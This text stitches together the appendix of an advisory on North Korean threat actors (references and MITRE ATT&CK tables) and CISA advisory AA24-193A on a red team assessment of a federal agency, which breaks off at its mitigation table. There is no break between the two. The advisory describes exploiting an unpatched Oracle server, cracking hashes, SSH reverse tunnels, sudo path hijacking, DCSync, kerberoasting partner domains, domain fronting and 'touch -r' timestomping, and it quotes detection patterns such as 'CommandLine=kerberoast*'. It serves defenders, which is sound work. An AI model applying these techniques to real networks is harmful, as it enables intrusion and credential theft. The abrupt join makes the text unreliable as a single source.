https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ https://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/ NSCS Guidance: Alert: Apache Log4j Vulnerabilities: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability Information: https://www.ncsc.gov.uk/information/log4j-vulnerability-what-everyone-needs-to-know Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector Appendix: MITRE ATT&CK Techniques and Software The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12. Table 3. Reconnaissance and Enumeration Technique Title ID Use Gather Victim Org Information T1591 The actors gather information about the victim’s organization that can be used during targeting. Gather Victim Host Information T1592 The actors gather information about the victim’s hosts that can be used during targeting. Active Scanning T1595 The actors execute active reconnaissance scans to gather information that can be used during targeting. Search Open Technical Databases T1596 The actors search freely available technical databases for information about victims that can be used during targeting. Table 4. Resource Development, Tooling, and Remote Access Tools (RATs) Technique Title ID Use OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel. Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration. Protocol Tunneling T1572 The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Develop Capabilities: Malware T1587.001 The actors develop malware and malware components that can be used during targeting. Develop Capabilities: Exploits T1587.004 The actors develop exploits that can be used during targeting. Table 5. Software used for Resource Development, Tooling, and RATs Software Title ID Use Mimikatz S0002 The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. AdFind S0552 The actors use a free command-line query tool that can be used for gathering information from the Active Directory. Table 6. Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network. Table 7. Execution Technique Title ID Use Command and Scripting Interpreter T1059 The actors abuse command and script interpreters to execute commands, scripts, or binaries. Table 8. Defense Evasion Technique Title ID Use Obfuscated Files or Information T1027 The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit. Table 9. Credential Access Technique Title ID Use OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Table 10. Discovery and Lateral Movement Technique Title ID Use Remote Services T1021 The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. Remote Services: SMB/Windows Admin Shares T1021.002 The actors use valid accounts to interact with a remote network share using Server Message Block (SMB). File and Directory Discovery T1083 The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Account Discovery T1087 The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. Table 11. Command and Control Technique Title ID Use Application Layer Protocol T1071 The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus. Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. Table 12. Collection and Exfiltration Technique Title ID Use Data from Network Shared Drive T1039 The actors search network shares on computers they have compromised to find files of interest. Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server. Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration. Exfiltration Over Web Service T1567 The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
EXECUTIVE SUMMARY In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture. Then, the team works directly with the organization’s network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team’s goal is to assist the organization with refining their detection, response, and hunt capabilities—particularly hunting unknown threats. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization’s detection capabilities and cyber posture. During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim’s Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets. The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase. The red team’s findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team’s compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs. The red team’s findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an “allowlist” approach to network behavior and systems, rather than a “denylist” approach, which predominantly results in an unmanageable amount of noise. The red team’s findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk: Lesson learned: The assessed organization had insufficient controls to prevent and detect malicious activity. Lesson learned: The organization did not effectively or efficiently collect, retain, and analyze logs. Lesson learned: Bureaucratic processes and decentralized teams hindered the organization’s network defenders. Lesson learned: A “known-bad” detection approach hampered detection of alternate TTPs. To reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below: Apply defense-in-depth principles by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions. Use robust network segmentation to impede lateral movement across the network. Establish baselines of network traffic, application execution, and account authentication. Use these baselines to enforce an “allowlist” philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric. CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise: Eliminate default passwords. Provide logging at no additional charge. Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents. Download the PDF version of this report: AA24-193A CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth (PDF, 1.18 MB ) AA24-193A CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth - Spanish Translation (PDF, 1.06 MB ) INTRODUCTION CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. § 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization. CISA conducted the SILENTSHIELD assessment over an approximately eight-month period in 2023, with three of the months consisting of a technical collaboration phase: Adversary Emulation Phase: The team started by emulating a sophisticated nation-state actor by simulating known initial access and post-exploitation TTPs. The team’s goal was to compromise the assessed organization’s domain and identify attack paths to other networks. After completion of their initial objectives, the team diversified its deployed tools and tradecraft to mimic a wider and often less sophisticated set of threat actors to elicit network defender attention. CISA red team members did not clean up or delete system logs, allowing defenders to investigate all artifacts and identify the full scope of a breach. Collaboration Phase: The SILENTSHIELD team met regularly with senior staff and technical personnel to discuss issues with the organization’s cyber defensive capabilities. During this phase, the team: Proposed new behavior-based and tool-agnostic detections to uncover additional tradecraft used during the Adversary Emulation Phase. They also evaluated the organization’s improvements according to current CISA priorities and public guidance. Troubleshot existing detection steps to show how certain TTPs evaded IOC-based detections. Deconflicted events from CISA red team activity, indicating unexpected network/application behavior or the potential presence of a real adversary in the network. Note: The team’s goal during this phase was to build the organization’s ability to detect malicious activity based on adversary behavior (i.e., TTPs) vice relying on known IOCs. This advisory, drafted in coordination with the assessed organization, details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization’s defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise. TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. During the Adversary Emulation phase, the red team gained initial access to the organization’s Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team’s activity and TTPs. Figure 1: SILENTSHIELD assessment timeline Adversary Emulation Phase Exploitation of the Solaris Enclave Reconnaissance, Initial Access, and Command and Control CISA’s red team used open source tools and third-party services to probe the organization’s internet-facing surface [T1594]. This included non-intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization’s web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access. The exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80 and 443, the RAT enabled consistent command and control (C2) traffic [T1071.001]. Note: After gaining access, the team promptly informed the organization’s trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response. About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023. Credential Access, Command and Control, and Privilege Escalation Once on SERVER 1, the red team probed the host’s files and folder structure [T1005] and identified several old and globally accessible .tar backup files, which included a readable copy of an /etc/shadow file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account’s weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80 and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1’s expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account’s password to a strong password. Figure 2: Exploitation of the Solaris Enclave The team discovered ACCOUNT 1 was a local administrator with sudo/root access and used it to move laterally (see the next section). Lateral Movement and Persistence Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004]. Some servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in-memory footprints. These tools communicated to a red team redirector over TCP/443, through valid HTTPS messages, and over SSH through non-standard ports (80 and 443) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports. The team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3). Figure 3: Example of Lateral Movement in the Solaris Enclave Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user’s .bash_history. These data mined credentials provided further avenues for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid and gid values to access all files and folders. To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron utility [T1053.003], as well as the at utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated. Full Enclave Compromise Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo with a relative path instead of the absolute path /usr/local/bin/sudo. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account’s password [T1574.007]. The harvested password granted unrestricted privileged access to the entire Solaris enclave. Exploitation of the Windows Domain While the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 4). Figure 4: Exploitation of Solaris enclave The team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials. Reconnaissance and Initial Access While attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization. They harvested employee names [T1589.003] and used the information to derive email addresses based on the target’s email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation. The team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization’s tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon. Credentialed Access and Privilege Escalation Internal network information was freely available to unprivileged, domain-joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe in .NET and Beacon Object File (BOF) ldapsearch from the phished user’s workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had system center operations manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain. The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization’s identity management (IDM). Lateral Movement and Persistence The team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization’s network hampered the red team’s ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001]. The red team tailored payloads to blend with the network’s environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004]. The team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism. The red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a Systems Center Configurations Manager (SCCM) server, as it was an advantageous network vantage point. The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing them to determine which account to use to pivot to other hosts. The team targeted the organization’s jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization’s server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator’s session token and laterally moved to a domain controller where they pulled credentials for the entire domain via DCSync [T1003.006], obtaining full domain compromise (see Figure 5). Figure 5: Exploitation of the Windows Domain After compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior. Pivoting Into External Trusted Partners The team inspected the organization’s trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally. The team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner’s domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6). figure 6: path of exploitation into external fceb organizations These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors. Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization’s host-based monitoring systems failed to identify the addition and removal of the red team’s firewall exceptions. Defense Evasion Techniques Solaris Enclave Figure 5: Exploitation of the Windows Domain Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization’s network defenders [T1036]. Additionally, by default, command auditing in Solaris via the lastcomm command only captures the program being run—full file path and any command line arguments are not recorded. For example: A real file: /opt/splunkforwarder/bin/splunkd A malicious copy: /opt/splunkforwarder/splunkd Command auditing logs: splunkd The team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch and chmod/chown commands [T1222.002] to blend with other files in the environment. Windows Domain The team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027]. Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised. To emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries’ diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET executables to run additional capabilities. All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality. Outbound traffic sent to public websites not owned by the red team had a Host header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445 and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection. Collaborative Phase Five months into the assessment, the red team officially notified the organization’s security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity. During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization’s senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team’s compromise: EDR alerts; YARA scans; C2 domains and techniques; Internal pivot hosts; Admin accounts used to pivot; Memory dumps, revealing attempts to pass credentials; and Email logs documenting the initial breach via phishing. Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps: Command execution (initial access and lateral movement); Establish C2 channels and exfiltrate data; Establish persistence; Escalate privileges; and Use and abuse credentials. All TTPs have corresponding artifacts, but not all IOCs are created equal. Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs. Major themes discussed during this phase that improved the organization’s behavior-based detection capabilities included log collection, forensic analysis, relying on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations. Log Collection The assessed organizations had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team’s assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60–90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage. The organization’s network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization’s operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt and evade their defenses. Forensic Analysis Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses. Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach. Red team operators regularly adjusted the last-modified timestamp of files and folders—using either the native touch -r command or implants’ timestomp command to disguise the last-modified timestamp captured in the output of ls –la. Secondary file timestamps identified with ls -lu or ls -lc would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation. Reliance on Known IOCs The red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known-bad detection strategies. The network defenders did not detect much of the team’s activity. For example: After identifying a red team payload, network defenders wrote tailored YARA rules that signatured specific behavior of the red team’s loader, which uncovered several similar payloads but failed to catch any of the other six C2 frameworks. Organization network defenders used a combination of custom and open source detection rules (such as CommandLine=kerberoast* or files called bloodhound.zip) and did not detect the team’s kerberoasting activity. Regular Monitoring and Investigation Management Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team’s intrusion and activity. For example: While EDR products detected and quarantined several of the red team’s tools, including the initial phishing payload, the organization’s daily procedures did not always include review of EDR alerts. The red team worked with the organization to ensure rapid response to EDR alerts became a fundamental part of network defenders’ daily workflows. This allowed SOC personnel to identify new attempts at lateral movement. Solaris network owners discovered that several firewalls had inadvertently been misconfigured or disabled. The organization’s technical teams worked directly with the red team to fix errors and to reorganize and revalidate the network topology. Network defenders had poor operational security and alerted the red team of investigations. For example: In one instance, after receiving incoming beacons from what was evidently a sandboxed environment, the payload was not renamed from its original file, allowing the red team to immediately identify how much of their access was under scrutiny. Organizations must ensure sandboxed environments are safe, secure, and thoroughly sandboxed. The red team observed system administrators reviewing forensic artifacts tied to the team’s Solaris payload—searching for files, running packet captures for outbound C2 traffic, and port scanning the C2 redirector. Team members simply reinstalled their persistence with a new redirector and file path, sidestepping the informal investigation. IT teams were siloed from the SOC, who had no knowledge of the system administrator’s weeks long investigation into the anomalous network behavior. While the organization compartmented most of its threat hunting and incident response in a separate domain, staff still used the compromised corporate domain accounts to communicate the details of active investigations and assessments. Sysmon Misconfigurations The red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations: Deployment teams pushed the ruleset (stored as a .xml file) to a globally readable C:\Windows directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA’s red team was provided explicit file paths to safely place their payloads. Rules targeted a single, tool-specific IOC rather than a technique (e.g., sc.exe rather than service creation events). Exceptions were overly permissive (for example, excluding all Image entries anywhere in C:\Program Files (x86)\Google\Update\*). LESSONS LEARNED AND KEY FINDINGS The red team noted the following lessons learned and key findings relevant to the security of the assessed organization’s network. These specific findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to address these findings. Lesson Learned: The assessed organization had insufficient controls to prevent and detect malicious activity. Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which failed to restrict outbound traffic. A majority of the organization’s hosts, including domain controllers, had internet connectivity to broad AWS EC2 ranges, allowing the red team to make outbound web requests without triggering IDS/IPS responses. These successful connections revealed the lack of an application layer firewall capable of detecting protocol mismatches on common ports. Finding #2: The assessed organization had insufficient network segmentation. The lack of network segmentation allowed the red team to move into, within, and out of both the Solaris and Windows domain. This also enabled them to gather a massive amount of data about the organization and its systems. Internal servers could reach almost any other domain host, regardless of type (server vs. workstation), purpose (user laptop, file server, IDM server, etc.), or physical location. Use of network address translation (NAT) between different parts of the network further obfuscated data streams, hindering incident response. Finding #3: The organization had trust relationships with multiple partner organizations, which—when combined with weak credentials and network connectivity—allowed the red team to exploit and move laterally to a partner domain controller. This highlights the risk of blindly allowing third party network connectivity and the importance of regularly monitoring both privileged access and transitive trusted credential material. Finding #4: The organization’s defensive staff did not sufficiently isolate their defensive investigative activity. Organizations should always communicate information pertaining to suspected incidents out-of-band, rather than from within a domain that they know to be compromised. While the defensive systems were shunted to another domain with correct (one-way) trusts, the red team identified a likely attack vector to that domain via the same, previously compromised IDM server. Some analysts also performed dynamic analysis of suspected implants from an internet-connected sandbox, tipping the red team to the specific files and hosts that were under investigation. Finding #5: Network defenders were not familiar with the intricacies of their IDM solution. The CISA red team identified accounts not enrolled in the IDM and successfully used those and already existing user access tokens to bypass IDM. The appliance, in its active configuration, was not exhaustively tested against common credential manipulation techniques nor were any alerts on anomalous behavior being monitored. Finding #6: The organization had some role-based host segmentation, but it was not granular enough. The organization used clearly defined roles (server administrator and domain administrator) but did not sufficiently segregate the accounts to their own servers or systems, enabling privilege escalation. Lesson Learned: The organization did not effectively or efficiently collect, retain, and analyze logs. Finding #7: Defensive analysts did not have the information they needed due to a combination of issues with collecting, storing, and processing logs. Other policies collected too much useless data, generating noise and slowing investigation. Finding #8: Network defenders’ daily procedures did not always include analysis of EDR alerts, and the tools that were installed only provided a 30-day retention for quarantined files. Consequently, investigators were unable to access timely information that may have led to earlier detection of the red team’s activity. Finding #9: Forensic analysts trusted host artifacts that could have been modified by an adversary. In particular, file timestamps and packet captures were scrutinized without considering the possibility of malicious tampering. Lesson Learned: Bureaucratic communication and decentralized teams hindered the organization’s network defenders. Finding #10: The organization’s technical staff were spread across decentralized teams. Siloed team structure meant that IT, security, and other technical teams lacked consistency with their tools, creating too much noise for defenders to sift through. Finding #11: The SOC team lacked the agency to rapidly update or deploy rulesets through the fractured IT teams. The organization diffused responsibility for individual tools, such as Sysmon, across multiple groups, hampering timeliness and maintenance of a defensive posture. Finding #12: The organization’s forensics team produced an incident response report which documented the red team’s initial exploitation of the Solaris enclave. However, the report was limited in scope and did not adequately document the red team’s ability to expand and persist. The success of the red team’s first phase, using publicly known TTPs, illustrated the business risk to all Solaris hosts and, by extension, the Windows environment. Moreover, the organization’s internal report only focused on vulnerable servers and did not account for a cyber threat actor’s ability to expand and persist in the Solaris enclave. The Solaris administrator’s investigations of the red team failed to appear in either the report or in SOC deconflictions. An admin’s inquiry into unusual and probably malicious activity, particularly in the middle of an investigation of confirmed breaches of adjacent hosts, should have been considered in the report as evidence of lateral movement. Lesson Learned: A “known-bad” detection approach hampered detection of alternate TTPs. Finding #13: Defenders hyper-focused on specific IOCs, such as file attributes, particular C2 frameworks, or C2 domains. The organization’s network defenders did not initially employ tool-agnostic detections, causing them to positively identify some red team tools, but remain blind to the full extent of the compromise. They were accustomed to catching internal red teams that used specific TTPs; introducing a new “threat actor” with new TTPs sidestepped nearly all detections. Finding #14: Detection rules were visible from compromised systems, allowing the red team to sidestep detections based on hardcoded rules and exceptions. Finding #15: There was insufficient restriction of administrative tools. The technical staff lacked a standardized set of administrative tools, leaving all remote administration protocols available for use by admins, CISA red team, or adversaries. This also created excessive noise for defenders to effectively sift through to determine expected versus anomalous activity. Finding #16: There was insufficient tracking of software. There was no apparent approval or tracking process for software installation across the domain, preventing defensive analysts from identifying abnormal software placed by the red team. A comprehensive inventory of approved software would help defenders identify abnormal behavior and facilitate the deployment of application allow-listing. NOTED STRENGTHS The assessed organization promptly planned for and resolved multiple identified issues, including with: Windows service accounts: The organization eliminated over 30 percent of service accounts which were deemed unnecessary. There is an on-going effort to change service account passwords and apply DoD recommended STIG compliance (over 85 percent have been changed since the publication of this report). IDM: The organization is looking into how to improve their IDM implementation and apply additional security alerts and preventions for possible misuse of credentials. They plan to implement additional identity-based monitoring capabilities in front of tier zero assets. Egress: The organization implemented new processes to detect and prevent servers from anomalously egressing outside of the network to the internet. Host-based solutions: The organization used additional features of their antivirus software, such as reputation scores, to look for all executable file type outliers of to identify anomalous instances. Hosts: The organization decommissioned clusters of servers and completely rebuilt them from scratch after identifying numerous irreparable issues and misconfigurations. Solaris credentials: The organization changed passwords, removed SSH keys, restricted permissions, and removed unnecessary accounts. MITIGATIONS Network Defenders CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Table 1: Recommendations to Mitigate Identified 